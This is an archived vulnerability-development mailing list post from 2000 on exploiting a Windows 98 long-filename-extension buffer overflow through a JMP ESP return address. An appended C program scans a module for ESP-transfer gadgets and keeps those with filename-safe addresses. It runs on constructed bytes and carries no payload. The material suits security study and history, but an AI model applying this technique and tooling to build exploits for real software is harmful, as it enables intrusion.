Vulnerability Development mailing list archives

exploit for W98 long filename extensions buffer overflow.


From: Laurent.Eschenauer () STUDENT ULG AC BE (Laurent Eschenauer)
Date: Sun, 23 Apr 2000 18:28:08 +0200


Hi all,

I managed to write an exploit for the nasty filename extension buffer overflow.
If you put more bytes in the extensions than in the batch proposed by Zoa
Chien, you can overflow such that ESP is actually pointing to your shellcode.
If you don't fill the buffer enough, you need to go upward in the stack
to find a reference to the extension...
- Does that mean we have two different buffer overflows?

Since we have ESP pointing to our code, we just have to find a JMP ESP
somewhere. I used one in comctl32.dll, but I'm not sure if this one is
static in all Win98 releases?

- Does anyone have a list of DLLs one can use to be sure of having a universal exploit?
  How do YOU check such a thing?

I've just put an "int 3" as the code to exec, to show that it's possible to use
this baby.
Anyway, it's going to be really tricky to do more, since we have only a few
bytes of code (after the smashed EIP at the end of the extension).
A solution would be to check if the other part of the extension is stored
at a fixed place upward in the stack and jump to it; I'll check that later.

One last thing: since we have to create a file with our exploit as the
filename, we encounter many "bad bytes", because you can't use everything
you want in a filename. I'll check that later too if I try to make a real
exploit out of this!

I didn't check with other products like Eudora, but hey, vuln-dev is for
development, no? So let's get to work to show Microsoft they have a new
BigBug to handle! I'm sure that with a little creativity we can find
many ways of remotely exploiting this.

You'll find more technical details in the code: which bytes
overwrite the EIP, where the code should go, etc.

have fun,

laurent.
------------------------
Laurent Eschenauer <laurent.e () mail com>
graduate student in computer engineering
networking and security project
University of Liège, Belgium.
------------------------

text/plain attachment: longext-exploit.c
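The two practical questions raised in the post above, how to check a DLL for a usable JMP ESP and how to avoid "bad bytes" once the return address has to survive as part of a filename, can be answered with a small scanner. The following is an added example written for this archive page; it is not the attached longext-exploit.c and not code from the poster. It scans a byte range standing in for a mapped module for the opcode sequences that transfer control to ESP (FF E4 jmp esp, FF D4 call esp, 54 C3 push esp; ret) and keeps only candidates whose four little-endian address bytes are all legal in a Win32 long filename. The module bytes and the base address 0x5F412300 are constructed for the example and are not real comctl32.dll contents or load addresses; whether a given address is stable across Win98 releases still has to be checked by running the same scan against each build.

```c
/* Added example: find ESP-transfer gadgets in a module image and reject
 * addresses that cannot be written into a filename. Constructed data only. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    const unsigned char *bytes;
    size_t len;
    const char *name;
} gadget_t;

/* FF E4 = jmp esp, FF D4 = call esp, 54 C3 = push esp ; ret */
static const unsigned char OP_JMP_ESP[]      = { 0xFF, 0xE4 };
static const unsigned char OP_CALL_ESP[]     = { 0xFF, 0xD4 };
static const unsigned char OP_PUSH_ESP_RET[] = { 0x54, 0xC3 };

static const gadget_t GADGETS[] = {
    { OP_JMP_ESP,      sizeof OP_JMP_ESP,      "jmp esp" },
    { OP_CALL_ESP,     sizeof OP_CALL_ESP,     "call esp" },
    { OP_PUSH_ESP_RET, sizeof OP_PUSH_ESP_RET, "push esp ; ret" },
};
#define NGADGETS (sizeof GADGETS / sizeof GADGETS[0])

/* A byte cannot appear in a Win32 long filename if it is a control
 * character (0x00-0x1F) or one of the reserved characters < > : " / \ | ? *.
 * Bytes >= 0x80 are codepage dependent and are treated as allowed here. */
int filename_bad_byte(unsigned char b)
{
    if (b < 0x20)
        return 1;                      /* also covers 0x00, which strchr would match */
    return strchr("<>:\"/\\|?*", b) != NULL;
}

/* The overwritten return address lands in the string little-endian, so every
 * one of its four bytes must be a legal filename byte. */
int address_filename_safe(uint32_t addr)
{
    int i;
    for (i = 0; i < 4; i++)
        if (filename_bad_byte((unsigned char)(addr >> (8 * i))))
            return 0;
    return 1;
}

/* Scan `len` bytes of an image mapped at virtual address `base`. Stores up to
 * max_out gadget addresses in out[] and returns the total number found (the
 * count may exceed max_out). With require_filename_safe set, candidates whose
 * address contains a filename-illegal byte are skipped. The scan is a plain
 * byte match, so a gadget inside a longer instruction also counts; that is
 * fine, since the CPU will happily execute from the middle of an instruction. */
size_t find_esp_gadgets(const unsigned char *image, size_t len, uint32_t base,
                        int require_filename_safe, uint32_t *out, size_t max_out)
{
    size_t found = 0, off, g;
    uint32_t addr;
    for (off = 0; off < len; off++) {
        for (g = 0; g < NGADGETS; g++) {
            if (off + GADGETS[g].len > len)
                continue;
            if (memcmp(image + off, GADGETS[g].bytes, GADGETS[g].len) != 0)
                continue;
            addr = base + (uint32_t)off;
            if (!require_filename_safe || address_filename_safe(addr)) {
                if (found < max_out)
                    out[found] = addr;
                found++;
            }
            break;                     /* one gadget per offset */
        }
    }
    return found;
}

/* Constructed stand-in for a DLL code section. SAMPLE_BASE is an assumed,
 * illustrative address, not a real comctl32.dll load address. */
#define SAMPLE_BASE 0x5F412300u
#define SAMPLE_LEN  128

void build_sample_image(unsigned char *buf, size_t len)
{
    if (len < 0x52)
        return;
    memset(buf, 0x90, len);                 /* NOP filler, forms no gadget */
    buf[0x1A] = 0xFF; buf[0x1B] = 0xE4;     /* jmp esp  at ..231A: 0x1A is a control byte */
    buf[0x2A] = 0xFF; buf[0x2B] = 0xD4;     /* call esp at ..232A: 0x2A is '*' */
    buf[0x41] = 0x54; buf[0x42] = 0xC3;     /* push esp ; ret at ..2341: all printable */
    buf[0x50] = 0xFF; buf[0x51] = 0xE4;     /* jmp esp  at ..2350: all printable */
}

/* Run the scan over the constructed image. */
size_t sample_scan(int require_filename_safe, uint32_t *out, size_t max_out)
{
    unsigned char img[SAMPLE_LEN];
    build_sample_image(img, sizeof img);
    return find_esp_gadgets(img, sizeof img, SAMPLE_BASE,
                            require_filename_safe, out, max_out);
}

/* i-th candidate address from the scan, or 0 if there is none. */
uint32_t sample_scan_nth(int require_filename_safe, size_t i)
{
    uint32_t out[16];
    size_t n = sample_scan(require_filename_safe, out, 16);
    return (i < n && i < 16) ? out[i] : 0;
}

int main(void)
{
    uint32_t out[16];
    size_t i, n = sample_scan(1, out, 16);
    printf("%lu filename-safe ESP gadget(s) in the sample image:\n", (unsigned long)n);
    for (i = 0; i < n && i < 16; i++)
        printf("  0x%08X\n", out[i]);
    return 0;
}
```

On the constructed image the unfiltered scan finds four gadgets, but only the two at 0x5F412341 and 0x5F412350 survive the filename filter; the other two are rejected because one address byte is 0x1A (a control character) and one is 0x2A ('*'). To apply the same check to a real module, replace the constructed buffer with the bytes of the code section and `SAMPLE_BASE` with the address at which that section is mapped in the target process.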

